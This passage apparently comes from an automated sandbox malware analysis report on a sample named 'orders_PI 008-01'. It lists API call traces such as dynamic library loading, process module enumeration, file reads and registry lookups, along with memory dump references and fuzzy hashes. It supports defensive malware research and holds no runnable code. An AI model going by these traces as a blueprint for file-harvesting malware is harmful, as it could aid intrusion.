                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$Time$CloseCompareCreateHandlememset
                                        • String ID:
                                        • API String ID: 2154303073-0
                                        • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                        • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                        • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                        • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                        APIs
                                          • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                        • String ID:
                                        • API String ID: 3150196962-0
                                        • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                        • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                        • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                        • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                        APIs
                                        • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$PointerRead
                                        • String ID:
                                        • API String ID: 3154509469-0
                                        • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                        • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                        • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                        • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                        APIs
                                        • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                          • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                          • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                          • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                        • String ID:
                                        • API String ID: 4232544981-0
                                        • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                        • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                        • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                        • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                        APIs
                                        • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                        • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                        • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                        • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                        APIs
                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                        • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$FileModuleName
                                        • String ID:
                                        • API String ID: 3859505661-0
                                        • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                        • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                        • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                        • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                        • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                        • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                        • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                        APIs
                                        • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                        • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                        • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                        • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                        APIs
                                        • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                        • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                        • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                        • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                        • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                        • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                        • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                        • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                        • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                        • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                        • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                        • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                        • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                        APIs
                                        • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                        • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                        • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                        • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                        APIs
                                        • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: EnumNamesResource
                                        • String ID:
                                        • API String ID: 3334572018-0
                                        • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                        • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                        • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                        • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                        APIs
                                        • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                        • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                        • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                        • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                        APIs
                                        • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CloseFind
                                        • String ID:
                                        • API String ID: 1863332320-0
                                        • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                        • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                        • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                        • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                        • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                        • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                        • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                        • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                        • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                        • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                        • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                        • Opcode Fuzzy Hash: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                        • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                        APIs
                                        • memset.MSVCRT ref: 004095FC
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                          • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                          • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                          • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                        • String ID:
                                        • API String ID: 3655998216-0
                                        • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                        • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                        • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                        • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                        APIs
                                        • memset.MSVCRT ref: 00445426
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                          • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                          • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                        • String ID:
                                        • API String ID: 1828521557-0
                                        • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                        • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                        • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                        • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                        APIs
                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
